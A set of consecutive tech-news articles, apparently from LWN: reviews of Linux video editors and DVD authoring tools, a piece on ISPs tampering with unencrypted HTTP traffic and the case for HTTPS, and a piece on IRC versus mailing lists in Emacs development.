The Grumpy Editor's video journey part 2: Video editors


In the first installment in this
series, your editor took on the task of getting video data onto his
system in digital form.  Part 3 talked about
authoring DVDs with the nicely edited versions of those video clips.  Now
it's time to fill in the missing second part, wherein your editor turns raw
captured video into something suitable for DVD creation.


The task to be accomplished is relatively simple: for each video clip, trim
off the extra junk at the beginning and the end.  Some of them also require
internal editing; there were signs of operator error in the form of, say,
extended sequences where the sole subject matter was the floor and,
perhaps, the cinematographer's shoe.  Nice transitions between the clips
were desired - a basic fade to black at the end, if nothing else.  The
addition of titles is useful.  And, as an added bonus, the video clips
needed to be deinterlaced before being written in a form suitable for
passing to the dvdauthor utility.


In the process, your editor encountered several tools in varying states of
readiness.  He has become better acquainted than ever with the notion of
"build hell."  A rather more than passing acquaintance with the behavior of
the out-of-memory killer in 2.6.24-rc kernels has also been achieved.  And,
at the end, your editor believes he has a reasonable sense of the state of
the art in Linux video editing.

Avidemux


Avidemux is a GTK-based
editor which, according to its web page, is "designed for simple cutting,
filtering and encoding tasks."  It is an interesting combination of
simplicity in some areas combined with great power and complexity in
others.  It has a lot of potential, but it also has a few rough edges.


For example, Avidemux handles DVD-style MPEG2 files without trouble.  But a
reader who digs far enough into the documentation (which is extensive and
useful, incidentally) finds a warning that one must exercise the "build VBR
time map" option, or audio and video will become unsynchronized in the
final product.  This operation is nearly instantaneous on a five-minute
clip; given the problems which can result from not doing it, why does
Avidemux not just build this "time map" when the file is loaded?  Why set a
trap like that for your users?


The actual video editing operations are quite simple.  Avidemux can only
handle a single video clip, and that clip has a single set of begin/end
points.  It is possible to delete from the middle of a clip using those
endpoints; deletion is instantaneous and leaves no sign on the timeline.
There is no "undo" operation, but there is an option to dump all
changes made to the file.
There is a scrollbar which enables quick movement through the clip; the
arrow keys move by single frames.  In general, the interface is responsive
on your editor's machine.


One place where Avidemux excels is in its selection of video filters.
For example, your editor went looking for a filter to deinterlace the
video; he found 21 different deinterlacing filters.  Many of these filters
have an extensive set of configuration options.  Actually choosing the
right filter and options for the task at hand is an intimidating task, and
the documentation does not provide a whole lot of guidance.  In the end,
Your editor got reasonable results with the "yadif" filter, as can be seen
in the "before" and "after" images on the left.


A fade-to-black ending was achieved with another filter.  It works
beautifully, if one does not mind that (1) there is no choice of what
to fade to beyond a "fade to black" toggle, (2) the portion of
the clip to be affected must be identified by typing in frame numbers, and
(3) those frame numbers are not adjusted should somebody, say, delete
some video from an earlier part in the clip.  The capability is there, but
the interface needs some work.


Other filters allow cropping, mirroring, color modifications, noise
removal, sharpening, blurring, addition of subtitles, the addition of logos
from image files, the creation of animated DVD menus, etc.  Should all of
those be inadequate, the "swiss army knife" filter is there for more
general low-level processing.  There is also a scripting interface for
Avidemux, though your editor did not attempt to make use of it.


The interface allows the user to view the video either before or after the
filters have been applied - or both together.  The latter mode, though,
tends to run slowly, though the post-filter output, by itself, worked just
fine.


In the end, saving the file out as a DVD "video object" does the job -
though one has to assume that the rather spartan "save" dialog will do
that.  Like most (but not all) video editors, Avidemux does not actually
change the video data until told to render a new file.  The list of edits,
filters, etc. can be saved as a "project" file (an Avidemux script, really)
so an editing session can be resumed at a future point using the original
material. 


The bottom line is that Avidemux is a capable and reasonably solid tool -
your editor was not able to make it crash.  Its long list of filters will
be appealing to some users.  Its inability to work with more than one clip
at a time will rule it out for many others, though.  Like so many other
tools in this category, it's almost there.

Cinelerra


The Cinelerra tool has an interesting history.  It was once known as
"Broadcast 2000," before being withdrawn because somebody was worried about
legal liability.  Now it is available as "Cinelerra," but in two versions.
The "official"
version is published by a company named Heroine Warrior, which has no
real interest in the hassles of dealing with a community or making regular
releases.  Heroine Warrior is, however, generous enough to make the code
available under the GPL; a group of developers has taken the code and made
Cinelerra CV - the "community
version."  This version is supposed to be under active development and move
more quickly, but it still doesn't seem to be moving all that fast,
unfortunately. 


There are some good documents for Cinelerra, but, reading them, one starts
to encounter certain themes.  For example:


	Cinelerra is not perfect. Before long you will be familiar with
	the tendency it has to crash


Or this
one:


	Quicktime is not the standard for UNIX but we use it because it's
	well documented. All of the Quicktime movies on the internet are
	compressed. Cinelerra doesn't support most compressed Quicktime
	movies but does support some. If it crashes when loading a
	Quicktime movie, that means the format probably wasn't supported. 


Cinelerra is by far the most complex - and capable - of the tools available
for Linux.  If you are looking for an editor designed for the creation of
complicated video with lots of effects, Cinelerra is the tool for you.
Unfortunately, Cinelerra does not appear to have a development community
which is up to the maintenance of a tool of this size.  So it is difficult
to work with and not particularly robust.


At startup, Cinelerra puts up four individual windows.  The "timeline"
shows all of the tracks being edited, and is the place where much work
actually gets done.  There are two video windows; one displays the current
state of the timeline, while the other can be used to look at individual
clips outside of the timeline.  Then the "resources" window holds
everything else.


The timeline display is quite nice.  Video thumbnails along the line give a
rough sense of what is happening in each clip.  The display of audio levels
is also highly useful when one is trying to find specific events; it would
be nice if other tools picked up this idea.  A number
of editing operations can be performed directly on the timeline; each
track, for example, has a horizontal line which can be manipulated to
adjust the (audio or video) levels at any given point.  So a fade-to-black,
for example, is a simple matter of ramping the video level down at the
right place.  


For more complex operations, there is a large list of effects which can be
applied.  These effects show up on the timeline next to the tracks they
operate on; their end points can easily be dragged around.  Cinelerra will
attempt to render effects when the timeline is being played, but that tends
to slow the program (not the fastest tool to begin with) to a point where
it cannot keep up with normal video rates.


Cinelerra does not modify any data until told to render the project.  It
cannot create DVD video objects directly; one must render audio and video
separately, then multiplex them outside of the program.  The edit list can
be saved separately.


There is a whole host of features in Cinelerra not found anywhere else.
For example, it can be used to drive a rendering farm for those big
production jobs.  There is a motion tracking subsystem built into it
("The intricacies of motion tracking are enough to sustain entire
companies and build careers around").  There's a set of options
for audio and video capture.  And so on.


But your editor could never get all that far with Cinelerra before it ran
the system out of memory.  One does, indeed, become familiar with its
tendency to crash, but it's especially annoying when it takes the rest of
the system down with it.  Cinelerra should really be one of the star
applications in the free software world.  It has a great deal of power and
can do amazing things; it could be a professional-quality tool.  What it
needs is for the community to truly take 
charge of the "community version" and turn it into a system which is fast,
robust, and easier to use.  To that end, it would help if the two people on
the planet who can succeed in actually building this system would clean up
that process and, in general, make Cinelerra more welcoming to new
developers.  The foundation for a great video editor is here, but there is
a lot of finishing work to be done.

Kdenlive


Kdenlive is a KDE-based editor under
active development; version 0.5 was released in August, 2007.  Having not
found a version for Rawhide, your editor set out to build this tool, only
to give up in despair.  So, as an aside, your editor would like to offer a
helpful suggestion to developers who want people to actually use their
code: if you absolutely must use your own build tool instead of
make, and there is just no alternative to using a tool which
nobody has heard of or packages and which does not have a web site or
working download location, please consider just packaging said tool with
your code.  Your editor is sure that "unsermake" is vastly superior to the
alternatives which we all have on our systems already, but it doesn't help
if you can't find it.

Of course, even after solving that problem, your editor was not able to
build this tool.  Fortunately, Ubuntu ships it, so that is the version
which was used here.

The initial Kdenlive experience is a little rough; it asks for a set of
default parameters.  How is one to choose between, say, "CIF NTSC" or "DV
NTSC" or "DV NTSC Widescreen"?  There is no help on offer to guide the user
toward the right choice.  Once past that, the user sees a window with three
major panes which offer functionality similar to that available from
Cinelerra.

The first step is to bring one or more video clips into the "project tree,"
which is (usually) visible in the upper left pane.  These clips can be
viewed in the "clip monitor" on the right.  A clip of interest can then be
dragged down to the timeline area, where it can be easily positioned
relative to any others which are already there.

Kdenlive uses the "divide and conquer" editing method.  To remove a section
of a clip, the user positions to one end of that section, then selects
"razor" to split the clip in two at that point.  Another split at the other
end isolates the section to be removed, which can then be deleted with a
separate operation.  There is (with the exception of transitions) no way to
apply an operation to a part of a clip - the area of interest must always
be razored out first.

As a result, the fade-to-black effect is not quite as easily achieved in
Kdenlive as with some other tools.  There is a "brightness" effect, but it
changes the brightness to a constant value through the entire clip.  The
way to fade out a scene is to add a new clip with a solid color (easily
done in Kdenlive), then use a crossfade transition to join the two clips
together.

Transitions are added by selecting the first track and, via the
right-button menu, selecting the desired transition.  Various parameters
(such as the time required for the transition) can then be tweaked.  It all
works easily; Kdenlive is a fun tool for quickly piecing together different
bits of video into a coherent whole.

There are separate video windows for displaying individual clips and the
timeline as a whole; by default, they cannot both be viewed at the same
time. Playback is responsive.  It's a little more awkward than with some
tools, though: the position cursor is small and hard to grab, and there is
a shortage of keyboard shortcuts for moving around.  The timeline is less
informative and less functional than Cinelerra's, but the information one
really needs is there.  


When the project is done, there is a nice "export to DVD" option there to
do the rest of the work.  Kdenlive can create the video object files and
fire up Qdvdauthor to do the rest, or it can create a
basic, single-title DVD internally and (using k3b) burn it to a disc.  Your
editor, thus, should have 
mentioned Kdenlive in the DVD authoring article, but he was unaware of this
feature at that time.  It all works easily; your editor was able to make a
playable DVD with minimal trouble.

It was not the most beautiful DVD, though, because Kdenlive has no
deinterlacing capability.  Those of us unlucky enough to be starting with
interlaced video must handle that operation separately, before or after the
editing process.


While any of the editors discussed here could conceivably work with
high-definition video, Kdenlive is the only one which appears to have been
written with that in mind.  Projects can be set up in HD formats without
undue tweaking.  Your editor was not in a position to test this capability,
though.

All told, Kdenlive comes across as one of the most finished of the free
editing tools.  It is relatively straightforward to use and it has all of
the features that most people are likely to need.  For many applications,
this could well be the first tool to reach for.

Kino


Despite its "K" name, Kino is a GTK-based
video editor.  It is quick and easy to use, but also lacking somewhat in
power.


Kino only works with a single video format - the digital video (DV) format
associated with contemporary camcorders.  When started with something else
(say, your editor's MPEG files from the capture card), it will offer to
convert the file into DV.  This process works, but the result is a
significant (5-10x) increase in the size of the file.


There is no timeline in Kino; instead, it has a "storyboard" in the
leftmost pane.  Each video clip becomes a separate scene in the storyboard,
with each being played strictly before the one after it.  Like Kdenlive,
Kino works by dividing clips and applying operations to the pieces.  So
trimming video is done by "splitting" the scene into wanted and unwanted
parts, then deleting the latter.  The documents make much of the "powerful"
three-point trim feature, but your editor doesn't get it; it just seems
like a way to set the beginning and ending split points on the same screen,
but the amount of work remains the same.


Moving within clips is quick and easy in Kino.  There is also a
scrollbar-based "jog wheel" for variable-speed motion in either direction.
What your editor really likes, though, are the keyboard shortcuts,
including vi-style bindings for moving, frame-by-frame, through the
material.  It makes finding the exact spot to make a cut a quick affair. 


Kino offers a reasonable set of effects, though the interface and
implementation are awkward.  Most effects apply to a full scene, so the
normal mode of operation is to split scenes where an effect is to be
placed.  There is an option to "limit" an effect to a period of time at the
beginning or end of a scene, though, so something like fade-to-black or a
crossfade can be done without making new scenes.


Or so one would think.  Unlike most other editors, Kino does not apply
effects at playback time; instead, an effect must be rendered when it is
applied to the scene.  The result is a new scene (even if the limit option
described above is used) which contains the result of a new DV file created
by the effect renderer.  For good measure, the rendering code places the
rendered file (with a name like 001.kinofx.dv) in the user's home
directory, which can quickly become cluttered with them.  This approach
lets Kino display effects without performance problems, but it is a bit
messy and inelegant.


While Kino only works with DV files, it has one of the nicest export
dialogs around.  There is a long list of options, one of which is DVD-style
MPEG.  There's even a "deinterlace" pulldown with a few options.  The
internal deinterlacer is, as advertised in the menu, very fast, but the
results are not all that great.  If one, instead, has Kino use the external
YUV deinterlacer, things will be exceedingly slow, but the results are
worth it.  Examples from both deinterlacers can be seen on the left.


By default, the DVD exporter creates the necessary video object file and a
simple dvdauthor script for a minimal DVD.  There are options, though, to
burn the DVD immediately or to go into Qdvdauthor for further work.


One might mention here that, like most of the other tools discussed here,
Kino does not play nicely with others when it comes to the audio
subsystem.  Each tool has its own way of responding to contention, though.
In this case, if Kino is unable to get exclusive access to the audio
device, it shows its displeasure by playing video (silently, of course) at
ten times the normal speed.  After a while one learns to recognize this
particular tantrum, but it still would be nicer if the application would
say something like "I'm not willing to share the audio device, can you
please stop your music player if you want to play back your video?"


Bottom line: Kino is a reasonably capable editor which, after a very short
learning period, is quick and fun to use.  It may well be the best option
for people with relatively simple needs.  Those wanting more sophisticated
capabilities, though, are likely to see it as an underpowered toy.

LiVES


The Linux Video Editing System
(LiVES) is a relatively simple editor with some interesting capabilities.
The web page claims:


	LiVES is good enough to be used as a VJ tool for professional
	performances, and as a video editor is capable of creating dazzling
	clips in a wide variety of formats. 


Your editor, however, is not a VJ.  So his experience with this tool was
not the best.

The process of importing a video clip into LiVES is slow and
disk-intensive.  After some investigation, your editor figured out why:
LiVES works by converting every video frame into a separate JPEG image
file.  The end result is a directory containing tens of thousands of images
and a massive expansion in the size of the clip.  It also cannot be good
for system performance in general; your editor can only suggest that using
a filesystem with indexed directories would be a good idea.

LiVES is one of those applications with such a sense of its own importance
that it comes up maximized from the outset.  The interface reconfigures
itself on the fly depending on what operations are selected - in
particular, video display windows come and go in a frequent and distracting
manner.  The default directory for video files in /usr/local.
Cross-fading one clip into another works, but it loses the 
synchronization with the audio.  Many tasks are done by running external
programs; should that program fail, LiVES will tell the user, but it does
not pass on the information provided by that program.  So figuring out
why things fail is a matter of digging through debug and
strace output.


Somewhere in this process, your editor decided that, while LiVES may indeed
make VJs happy, it is not a serious editing tool for the rest of us.  There
is the potential for some nice features there, but this application needs a
lot of work before it will be ready for general use.


PiTiVi


One gets used to thinking of video editors as being huge programs written
in relatively fast languages.  PiTiVi, however, is an
exception to the rule: it's a smallish application written in Python.  Of
course, it's only small when one overlooks some of the external pieces -
like gstreamer.

This application, too, was a bit of a challenge to get going.  It has
various dependencies not accounted for in its configure script, including
some strange ones: why does a video editor need to import Zope modules?
Still, your editor had better luck here than with some of the alternatives.


The good news is that, despite its Python implementation, PiTiVi is
responsive when moving around in video clips.  On the other hand, moving
around in clips is really about all that PiTiVi can do at this point.
There is a rudimentary timeline display which does not do anything, and no
editing options are available.  So PiTiVi, while being a promising start,
is not really an editor at this time.


Conclusion

Worth mentioning in passing: the Open Movie
Editor looks like a tool with some promise.  It disliked your editor's
video files, though, claiming that it only supports files with a 25
frames/second rate.  Your editor, deep in NTSC country, has no such files.
Hopefully, as this project matures, it will achieve the generality this
kind of tool must have.


The free software community can be aggravating sometimes.  We clearly have
the ability and the desire to create top-quality tools for tasks like video
editing.  But what we get is a half dozen tools, none of which is a
complete solution to the problem.  Your editor would be the first to say
that competition between projects can be a good thing, inspiring everybody
involved to push harder and achieve more.  But, still, maybe having fewer
competing tools might just help people to work together and make tools
which are truly great.


That said, the state of the art in Linux video editing is not as bad as one
might think.  The tools are there to put together a decent video without a
great deal of trouble.  As mentioned above, Kdenlive is arguably the most
polished of these tools, with Kino also being a good candidate for simpler
applications.  And Cinelerra remains in its position as the application
that is going to be truly spectacular, once all of those loose ends finally
get tied up.


Your editor once heard Lawrence Lessig say that text is like Latin for
younger people today, and that video is the preferred way to communicate.
If that is true, then we want to make it possible to communicate as richly
as possible while using free tools.  We have a good base to build on, and
many smart people have solved many of the hardest problems.  Finishing the
job is well within our capabilities.

		The Grumpy Editor's video journey part 3: DVD authoring


As readers of the first part of
this series will remember, your editor has set out on a project to
digitize a set of old video tapes and turn them into properly-formatted DVD
media suitable for handing out to the grandparents.  Part 1 was about
the task of 
capturing this data to disk; part 2 covers the video editors available
for turning the captured data into something watchable, and part 3
covers the task of creating a DVD from the edited video.  


Attentive readers may have noticed that part 2 has not yet been
written; there are more editors available than your editor had expected
(currently under review are Cinelerra
CV, Kino, PiTiVi, LiVES, and Avidemux), so that process is
taking longer than expected.  For the purposes of this article, let us
assume that your editor has a disk full of video clips which have been
edited and properly formatted into the MPEG2/AC3 video object files expected
by DVD players.  There will be a discussion of the best ways to get those
files there in the near future, promise.


Many of us have burned CDs and found the process to be relatively
straightforward - the biggest obstacle is often just getting past the
grumpiness built into cdrecord and its latter-day derivatives.  Creating
data DVDs is not a whole lot harder.  So one might be inclined to approach
the task of creating a video DVD with a "this will be easy" attitude.  It
is, in fact, a task just about anybody can learn to do, but it is on a
different order of complexity than creating a CD full of music.  A video
DVD is, in truth, a program complete with its own hierarchical structure,
menus, and code written for the simple virtual machine lurking within every
DVD player.  Creating a playable DVD requires writing that program.


If DVDs are programs, then the one compiler available for Linux systems is
the command-line dvdauthor
tool.  Regardless of how one builds a DVD, dvdauthor will be involved in
the process at some point.  This tool requires a collection of video
objects representing the actual video titles and also implementing the
menus, subtitles, and more.  It's all tied together via a complex XML file
(example) which is compiled by dvdauthor to
create the final product.


It is possible to create all of these pieces by hand, and, doubtless, Real
Linux Video Jocks would not do it any other way.  One can use dvdauthor to
help with the generation of parts of the XML file.  There is documentation
which seems fairly complete, if a bit terse.  But the fact of the matter is
that most people attempting to use this tool directly will give up in
despair.  There is no reason why DVD authors should have to work at this
level; dvdauthor is essentially an assembler which, while being absolutely
essential to do most of the heavy lifting, should be hidden from most
polite company.  DVD creation is a visual task; there should be
visually-oriented tools for this job.  The good news is that these tools
do, indeed, exist.

DVDStyler


The first of these tools is DVDStyler, a GTK-based application.
There are three basic tabs which are used to work through the tasks of
piecing together a DVD; they are labeled "Directories," "Backgrounds," and
"Buttons."  The directories tab pulls up a simple internal directory
browser, useful for adding objects to the DVD.  So, if the DVD author has a
collection of VOB files containing video data, they can be found by way of
this tab and added, one by one, to the DVD.  Each object shows up in the
bottom pane of the window, generally with an unhelpful annotation like
"Title 2".  There is no easy way to see what each of those titles is;
one must query their properties and look at the associated file name.

As a grumpy aside, your editor must note that the directory browser
uselessly starts at $HOME.  One need not work with much video data
before realizing that special provisions must be made for its storage;
video objects are unlikely to be kept in the home directory.  Your editor
has a hard time understanding why tools like this are unable to start file
searches in the current working directory, which is a much more likely
place to find things of interest.  Switching to $HOME is not just
a least-surprise violation; it actively makes things harder for the user.

The "Backgrounds" tab helpfully offers a dozen or so canned background
images which can be used for the DVD menus.  They are nice backgrounds, and
they might just be useful for somebody struggling through the process of
creating a DVD for the first time.  Your editor, though, suspects that most
users, by the time they create their second (working) DVD, might just want
to supply their own background images.  They will look for that option
under the "Backgrounds" tab in vain, though.  It is possible to
supply a custom image: go to the large (video screen) pane, right-click,
select "properties," and set an image there.  It's easy, once you've
figured it out.  But one would think that, having gone to the trouble to
provide an entire mode dedicated to background images, the developer would
have thought to toss in a "none of the above" button.


The hardest part of creating a DVD (once one has suitable video in place,
obviously) is getting the menus to work.  DVDStyler starts with an empty
main menu in place; it is up to the user to add entries which will do
interesting things.  That is done by way of the "Buttons" tab.  There's a
selection of arrows available, as well as the ability to add basic text
buttons.  The button of interest can be simply dragged to the right spot on
the menu, sized appropriately, and configured to do the right thing.  There
are also "empty" buttons for more complicated situations where the real
button text (or image) is found on the menu's background image.


Having added a button, the author must tell the system what happens in
response to events on that button.  To that end, there is a separate
"properties" dialog.  Usually one wants a button to cause a certain video
title to be played, and that is easily configured.  If more than one menu
has been created, buttons can also be set to jump from one menu to the
next.  There is a "custom" blank for the harder cases which require direct
entry of code to be executed by the DVD virtual machine.  In DVDStyler, the
selection of relatively obscure options (subtitles, languages, camera
angles) can only be set up in this way.


Also required is a specification of what happens when one of the
directional arrows is pressed.  The default "auto" setting leaves that up
to the player, which will probably do the right thing - the down arrow, for
example, will move the focus to the next button below the current one.
Anybody who is concerned about the user interface provided by the resulting
DVD will probably want to set these actions explicitly, though - a somewhat
tedious and time-consuming task.


Eventually, the time comes to actually create the DVD.  Most first-time
users will probably go to the DVD menu for this task, but the "burn" option
is not there - it's under the "file" menu instead.  The resulting dialog
works nicely, giving the user the option to stop after generating the ISO
image or to run a preview application (xine by default) before actually
writing to the disk.  Underneath this dialog is a whole set of helper
commands which are run; those can be configured if need be, but most users
will not tread there.


All told, your editor found DVDStyler to be the easier tool to use for
quickly putting together a video disk.  There is just one little problem:
those disks never quite worked right on your editor's ancient DVD player.
Somehow, a misunderstanding about how the menus should work crept in.
Your editor suspects, perhaps, that overlapping buttons may have something
to do with it; the other application reviewed by your editor (QDVDAuthor)
detected and corrected that situation, but DVDStyler did not.  In any case,
newer players had no problem with the generated disks, so this may not be a
problem that most people need to be concerned with.

'Q' DVD-Author

 
The other DVD authoring application considered here is 'Q' DVD-Author (or qdvdauthor
from here on out in an effort to save your editor's typing fingers).  This
is a Qt-based application aimed at providing complete DVD authoring
capability.  It is arguably more complete and mature than DVDStyler, but
more complex as well.


Qdvdauthor provides a three-paned window with areas for the current set of
audio/video objects, the DVD hierarchy, and the menu designer.  The
audio/video pane, on the left end, is clearly a work in progress.  There is
a thumbnail area which shows the opening frame of the associated video -
sometimes.  Other times it stays green and qdvdauthor silently leaves an
mplayer process desperately cranking away in the background.  It was only
when the load average on your editor's system got to around 20 that he
figured that one out.  There is a "play" button which pops up a cheery "not
yet implemented" button.  The run time of each video title is also displayed.
All told, it is a more useful display than what DVDStyler offers, with the
potential to be quite a bit better yet.


The middle pane shows the current hierarchy of objects making up the DVD.
It is a helpful display, given that DVDs truly are hierarchical objects.
It likes to reset itself to the top, though, making it necessary to scroll
repeatedly toward the bottom when the DVD gets more complex.  The right
pane shows one of the DVD menus - or a couple of other things we'll see
later on.  One very nice feature is the little display at the bottom
showing how much data has been committed to the DVD so far and how much
room remains.


Video titles are easily added using the prominent "add movie" button.  Once
attention turns to the menu creation process, one notices that there is no
separate "backgrounds" tab - but there is a button for adding a custom
background image, which is what is really needed anyway.  Your editor found
that dragging a thumbnail from the video pane over to the menu area created
a picture button which would play the associated title - a nice feature.


The creation of text buttons (or those from a separate image) is a bit more
labor-intensive, requiring the user to right-click on the background,
select "add text", draw a rectangle to define the text area, fill in
a rather gaudy text dialog (shown left) with the actual text (and tweak
fonts and
such), right-click on the newly-added text and select "define as
button", then fill in the button properties dialog (shown right).  That
last step 
involves setting the button name (necessary - it would be nice if it
defaulted to the button text) and picking the various associated actions.
It takes a while.


Eventually, the time comes to commit all of that work to an actual DVD.  A
click on the associated button gets that process going.  If one has been
sloppy in drawing out buttons, the first thing to come up will be a warning
that some of the buttons overlap, accompanied by an offer to fix the
problem automatically.  One can also decline the offer (aborting the
process) to fix the problem manually.


This is as good a point as any to note that moving and resizing buttons in
qdvdauthor is a real exercise in pain.  The button areas have the usual
grab points for moving, dragging edges and corners, or rotating the
button.  But none of those are visible until the user has clicked the mouse
and committed himself to doing something.  The end result is that attempts
to drag a button often do something else - like rotating them to some
strange angle.  The basic interaction modes for operating on graphical
objects in a display have been well understood for years; one can only
imagine that whoever designed this interface was engaging in some sort of
sadistic exercise which was sponsored by purveyors of
strong drink.


Once the buttons have been sorted out, selecting the burn operation brings
up a rather intimidating dialog showing all of the commands which will be
executed to get the job done.  It's at this point that one realizes just
how much behind-the-scenes magic is going on to make the DVD creation
process actually happen.  There are options to disable specific parts of
the process (actually burning the disk, for example), and the adventurous
can edit the commands before they run.  Most people, though, will probably
just hit the "OK" button at the bottom and watch the process unfold.  Which
it does, just as one would expect.


There's a few other nice features hidden in this application.  The menu
pane can be made to show the XML file which will be generated for
dvdauthor; it can also be put into a garish and complex dialog which
facilitates the addition of subtitles.  There is a template mechanism for
menus, and a network-based repository from which qdvdauthor can download
new templates.  There is an operation which will convert the entire DVD
between the NTSC and PAL formats - your editor has not yet exercised this
option, but, given that some of the grandparents for whom this work is
intended live in Europe, it will eventually come in handy.  There is a
little-used plugin mechanism and a theme feature as well; long-neglected
Motif users will be glad to know there is a style for them.  The addition
of audio to menus and intro/outro sequences to titles is relatively
straightforward.  There is also an option to make DVD slideshows out of a
series of still images.

Conclusion


Either one of these applications can get the job done.  They both show the
best of how an application on a Unix-like system can add power by using
existing tools.  Neither DVDStyler nor qdvdauthor actually does much of the
work of creating menus or burning DVDs; they mostly just put together
fiendishly-complex command lines and call out to the tools which have been
designed to do that work well.  Overall, the combination works reasonably
well.


A feature which is lacking from both tools is a "hold my hand" mode for
people who are not - and do not want to be - experts in DVD creation.  A
sequence of screens which would set up an initial menu, import titles, and
create buttons for each would be most helpful in this regard.  As it is,
users must have their own internal checklist in mind when creating DVDs,
and it is easy to miss things.  Your editor, while certainly slower than
most, is unlikely to be the only one to have created an impressive pile of
coasters before finally producing a DVD which actually worked as intended.


While the tools edited here are, in your editor's opinion, the best
available for Linux for this task, there are some others to be aware of:


 Tovid
     is a set of command-line tools for the creation of DVD menus and
     putting the whole structure together.  They hide much of the
     underlying complexity and may prove useful for users not wanting to
     work with a graphical interface.

 VideoLink
     is an interesting tool which enables the creation of DVD menus in
     HTML.  It then renders them with a web browser and prepares the result
     for burning to a DVD.

 Kino (which will be covered in
     depth in part 2) can produce a simple dvdauthor script to make a
     no-menu DVD with a single title.

 KDE
    DVD Authoring Wizard is a kdialog script which steps the user
    through the creation of a simple DVD.  It provides the handholding
    mentioned above, but, arguably, simplifies out too much of the
    process. 


Of all these tools, it must be said that qdvdauthor is, at this time, the
most complete and capable.  It provides access to almost any capability
supported by current DVD players, is relatively easy to use, and works most
of the time.  With luck, the developers (who released the 1.0.0 version
reviewed here in November, 2007) will devote themselves to smoothing out
the remaining rough edges, leaving us with a tool which DVD authors at any
level can use.

		The future of unencrypted web traffic


Hypertext transfer protocol (http) is the heart of the web, providing the
means to retrieve content from remote servers.  It is an unencrypted,
text-based 
protocol which allows malicious intermediaries to snoop on and potentially
modify the traffic. 
Unfortunately, internet service providers (ISPs) are getting increasingly
bold in manipulating the traffic that they carry.  This has lead some to call for
the elimination of http, in favor of encrypted http (aka secure http or
https). 


An ISP is perfectly situated to gather an enormous amount of information
about its users, their website preferences and habits (often called
clickstream data).  Some have reportedly
been selling some of that data in a thinly-anonymized form to
advertisers and others.  As AOL's well-intentioned, but poorly implemented,
release of
search queries showed, it is rather easy to analyze this kind of
data and pierce the anonymity, deriving the specific user. 


Another recent ISP trick is to modify a retrieved web page to display other
information – under the control of the ISP – which looks like
it comes from the website itself.  Canadian ISP Rogers Internet has been testing a system to add
content to the Google homepage for their customers who are near their
monthly bandwidth limits.  There are also plans afoot for ISPs to use
clickstream data to target advertising – though just where those
ads would show up is far from clear.


This kind of manipulation is unlikely to be what internet users expect
– to the extent they think about it all.  The model folks tend to use
is that of a phone company; we do not expect them to sell our call records
to the highest bidder, nor do we give them license to modify our calls.
Various telecommunications privacy laws protect that data, but those laws
have not (yet) been applied to internet traffic.  In addition, ISPs tend to
have a monopoly or near-monopoly, which restricts alternative,
less-intrusive ISPs from competing. 


Fortunately, there are technical solutions possible in the internet realm
that would be difficult or impossible to implement network-wide in the
phone system.  Encrypting website traffic will go a long way towards
eliminating this kind of ISP abuse, though it is no panacea.  As more of
these kinds of privacy invasions occur, we should see more routine use of
https by websites.


Currently, https is almost exclusively used for e-commerce transactions;
typing in credit card numbers and the like.  Authentication via username
and password is another area that sees widespread encrypted pages.  Sites
may start to use https for their entire site to combat clickstream and page
rewriting abuse – though there will still be some information leakage
as the ISPs can still see what sites are being visited.


In order to make an https connection, the server must have a certificate
with its public key.  Typically those are signed by an authority recognized
by browsers which allows the browser to authenticate that the certificate
belongs to the host visited.  Getting signed certificates is a bit
cumbersome, costs some money, and they need to be renewed periodically
– all of which adds up to a headache for a site, especially a small,
non-commercial site, that wants to switch
to using https.  Self-signed certificates are an alternative, but because
they are susceptible to man-in-the-middle attacks, browsers warn their
users when they receive one. 


Another problem with this approach is the extra processing required on the
server to support encrypting each and every request.  There is a
non-trivial amount of extra work that must be done per request and cannot
be cached.  Sites that wish to avoid the problems that some ISPs are 
introducing will just have to bear that cost.


Pushing bits is not very glamorous, but that is really what one hires an
ISP to do.  Since they seem to be finding new and exciting ways to
interfere with those bits – Comcast
messing with BitTorrent traffic 
for example – internet users will have to find ways to thwart their
schemes and encryption will be a big part of that effort.  Using https
site-wide is only one step, other services will also need to be protected
from ISP abuse.  What if an ISP started manipulating the results returned
from DNS queries, perhaps routing some to a server they control?


		Development issues part 1: Project communication


 Free software projects, like all projects, live and die by their
communications; developers must be able to talk to each other easily so
that a consistent, coherent result emerges.  But developers have differing
ideas about what methods to use.  A discussion on the Emacs development
list provides a nice contrast between two of the main communications
methods used by projects today.  

Traditionally, developer communications have been handled
by the venerable mailing list, but that is changing, at least for some
projects.  Internet relay chat (IRC) has become the tool of choice
for newer projects, which may leave those who are not inclined towards
realtime communication out of the loop.  Development methodologies are
evolving, and some are adopting the new ways more quickly than
others – some may never adopt them at all.


The difference between communicating in IRC or via a mailing list is in
some ways like the difference between text messaging and email.  Email has
its advantages, in that the recipient chooses the time to read and respond
to the message, but it is often seen as slow.  Text messaging or IRC have the
advantage of speed; people receive a message and generally respond
immediately.  But that speed comes at a cost – interrupting the
recipient.  It also requires a full-time internet connection.

 While email archives are somewhat cumbersome to use, they are usable.
IRC logs are exceedingly painful as they are not subject-based; they just
cover a specific time span of all conversation on the channel.  Email
conversations may play out over days or weeks, but they are generally
easier to follow compared to the multiple interleaved conversations that
occur on IRC channels.  It is in the nature of the medium: IRC
conversations are meant to be used immediately, not reread weeks later.


It is, in some ways, a culture clash.  Younger developers tend to be more
inclined towards realtime communications, while older hackers tend to be more
comfortable with mailing lists.  In what would seem to be an uphill battle,
Eric S. Raymond has been advocating a more "modern"
development style for GNU Emacs.  His messages, appearing on Emacs-devel,
champion a development style that includes IRC communication, a bug
tracking system, and a version control system (VCS) more advanced than CVS.


Raymond's experiences working with the Battle for Wesnoth development team exposed him to
some of the newer techniques used in project communication, particularly
IRC.  He reached a somewhat surprising conclusion about IRC: 

And far from finding I can't keep up, I've discovered that I like the
stimulation.  I grok how the kids feel about this, because
mailing-list-only
projects have started to seem slow and boring to me, too.


The Wesnoth project uses IRC for all day-to-day design and development
decisions, leaving the mailing list for more complicated discussions and
white papers.  This has the effect of excluding interested developers who
are not able or willing to monitor an IRC channel throughout their day, but
that is unlikely to be the intent.  The reverse is also true: the perceived
slow pace of mailing-list only projects has the effect of excluding those
with a strong preference for a faster style of development.  As Raymond
shows, though, there is hope that members of one school can retrain –
if they wish – for the other.

 While decision making by IRC does not seem to be in the cards any time
soon for Emacs, an upgrade to something other than CVS seems to have gained
more traction.  Richard Stallman has been asking a lot of questions about
git while other developers discuss other distributed version control
systems (DVCS), like darcs, monotone, arch, and Mercurial.  Raymond is
working on a survey of the VCS landscape that, once completed, 
he and others hope will guide the project into a better VCS choice.

